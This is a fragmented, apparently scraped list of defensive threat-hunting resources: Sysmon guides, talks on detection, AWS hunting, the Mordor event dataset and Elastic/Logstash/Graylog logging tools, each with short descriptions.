Services: Windows 10 Services(ss64)
-
Sysmon
-
101
- Sysinternals Sysmon suspicious activity guide - blogs.technet
-
SysmonCommunityGuide
- TrustedSec Sysinternals Sysmon Community Guide
-
(SwiftOnSecurity's )sysmon-config
- Sysmon configuration file template with default high-quality event tracing
-
Articles/Writeups
- SysInternals: SysMon Unleashed
- Threat Hunting: Fine Tuning Sysmon & Logstash to find Malware Callbacks C&C - Pablo Delgado
- Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals - Spartan2194(2019)
-
Visualise Sysmon Logs and Detect Suspicious Device Behaviour -SysmonSearch-
- JPCERT/CC has developed and released a system “SysmonSearch” which consolidates Sysmon logs to perform faster and more accurate log analysis. We are happy to introduce the details in this article.
-
Investigate Suspicious Account Behaviour Using SysmonSearch
- In a past article in September 2018, we introduced a Sysmon log analysis tool "SysmonSearch" and its functions. Today, we will demonstrate how this tool can be used for incident investigation by showing some examples.
-
Talks & Presentations
-
Implementing Sysmon and Applocker - BHIS
- In almost every BHIS webcast we talk about how important application whitelisting and Sysmon are to a healthy security infrastructure. And yet, we have not done a single webcast on these two topics. Let's fix that. In this webcast we cover how to implement Sysmon and Applocker. We cover overall strategies for implementation and how to deploy them via Group Policy. We walk through a basic sample of malware and show how both of these technologies react to it. Finally, we cover a couple of different "bypass" techniques for each. Everything in security has weaknesses, and these two technologies are no exception.
-
Endpoint Detection Super Powers on the cheap, with Sysmon - Olaf Harton(Derbycon2019)
- Based on my experience as a blue and purple teamer I wanted to create a workflow toolkit for anyone with access to Splunk to get started with a set of tools that enables them to hit the ground running on a tight budget without compromising on quality. I will explain the pain of lacking visibility in a common Enterprise environment. I will present my hunting app, which contains over 150 searches and over 15 dashboards. Knowledge is power; The workflow has been intentionally built on generic searches to cover all attack variations, to be able to uncover most potentially malicious behaviour. The dashboards contain overviews, threat indicators and facilitate consecutive drilldown workflows to help the analyst determine whether this is a threat or not and allow them to whitelist.
-
Implementing Sysmon and Applocker - BHIS
-
101
-
WMI
- Articles/Writeups
- Talks & Presentations
- Talks & Presentations
-
Tools
-
BLUESPAWN
- BLUESPAWN is an active defense and endpoint detection and response tool which means it can be used by defenders to quickly detect, identify, and eliminate malicious activity and malware across a network.
-
CimSweep
- CimSweep is a suite of CIM/WMI-based tools that enable the ability to perform incident response and hunting operations remotely across all versions of Windows. CimSweep may also be used to engage in offensive reconnaisance without the need to drop any payload to disk.
-
BLUESPAWN
-
General
-
-
AWS
- Articles/Writeups
-
Talks & Presentations
-
Actionable threat hunting in AWS (SEC339) - Chris Farris, Suman Koduri(AWS re:Invent 2019)
- Learn how WarnerMedia leveraged Amazon GuardDuty, AWS CloudTrail, and its own serverless inventory tool (Antiope) to root out cloud vulnerabilities, insecure behavior, and potential account compromise activities across a large number of accounts. We cover how WarnerMedia centralizes and automates its security tooling, offer detailed Splunk queries for GuardDuty and CloudTrail, and discuss how Antiope is used for vulnerability hunting. We cover the scaling issues incurred during a large enterprise merger. Leave this session with a strategy and an actionable set of detections for finding potential data breaches and account compromises.
- Blogpost
-
Actionable threat hunting in AWS (SEC339) - Chris Farris, Suman Koduri(AWS re:Invent 2019)
- Azure
- GCP
-
AWS
-
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Tools
-
Data Sets
-
Mordor
- The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption. The pre-recorded data is categorized by platforms, adversary groups, tactics and techniques defined by the Mitre ATT&CK Framework. The pre-recorded data represents not only specific known malicious events but additional context/events that occur around it. This is done on purpose so that you can test creative correlations across diverse data sources, enhancing your detection strategy and potentially reducing the number of false positives in your own environment.
-
Mordor
-
Data Sets
Threat Analysis
-
Tools
-
Danger-Zone
- Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files.
-
Danger-Zone
Data Storage & Analysis Stacks
-
- 101
- Setting up a lab
-
Elastic Search
- 101
- Reference
- Articles/Writeups
-
Tools
-
ElastAlert
- ElastAlert is a simple framework for alerting on anomalies, spikes, or other patterns of interest from data in Elasticsearch.
-
ElastAlert
-
dejavu
- The Missing Web UI for Elasticsearch: Import, browse and edit data with rich filters and query views, create search UIs visually.
-
Kibana
-
101
-
Kibana
- Kibana is an open source (Apache Licensed), browser based analytics and search dashboard for Elasticsearch. Kibana is a snap to setup and start using. Kibana strives to be easy to get started with, while also being flexible and powerful, just like Elasticsearch.
- Introduction to Kibana
-
Kibana
- Reference
- Articles/Writeups
-
101
-
LogStash
-
LogStash
- Logstash is a tool for managing events and logs. You can use it to collect logs, parse them, and store them for later use (like, for searching). If you store them in Elasticsearch, you can view and analyze them with Kibana. It is fully free and fully open source. The license is Apache 2.0, meaning you are pretty much free to use it however you want in whatever way.
- Getting Started With Logstash
- Logstash Documentation
- logstash anonymize * Anonymize fields using by replacing values with a consistent hash.
-
LogStash
-
-
Setting up a lab
-
No More Secrets: Logging Made Easy Through Graylog - VDA Labs
- Part 1: Installation, securing, and optimizing the setup part 1
- Part 2: Installation, securing, and optimizing the setup part 2
- Part 3: Domain Controller/DHCP log collection and alerts
- Part 4: File/print server log collection and alerts
- Part 5: Exchange server log collection
- Part 6: IIS log collection
- Part 7: Firewall log collection
-
No More Secrets: Logging Made Easy Through Graylog - VDA Labs
-
Setting up a lab
-
Articles/Writeups * Hunting Red Team Empire C2 Infrastructure
* [Hunting in Memory](https://www.endgame.com/blog/technical-blog/hunting-memory) * [Taking Hunting to the Next Level Hunting in Memory - Jared Atkinson 2017](https://www.youtube.com/watch?v=3RUMShnJq_I)
- Talks & Presentations
-
- Designed to be installed on a fresh install of raspbian on a raspberry pi, by combining Respounder (Responder detection) and Artillery (port and service spoofing) for network deception, this tool allows you to detect an attacker on the network quickly by weeding out general noisy alerts with only those that matter.